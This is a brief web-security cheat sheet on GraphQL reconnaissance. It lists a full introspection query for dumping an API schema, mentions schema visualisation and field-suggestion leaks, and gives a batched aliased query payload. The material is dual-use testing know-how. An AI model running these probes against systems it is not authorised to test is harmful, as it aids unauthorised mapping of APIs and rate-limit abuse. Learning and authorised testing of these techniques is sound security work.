πŸ“‰

Basic GraphQL Exploitation

Tags
Web Security
Date
Apr 20, 2022
Β 

Check introspection is enabled or not

query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } } } fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef } } fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } } }
Voyager to visualize it
Β 
Graphql providing a suggestion, we could make an advantage over it

Batching Query

{"query": "query { assetnote: Query { hacktheplanet } assetnote1: Query { hacktheplanet } }"}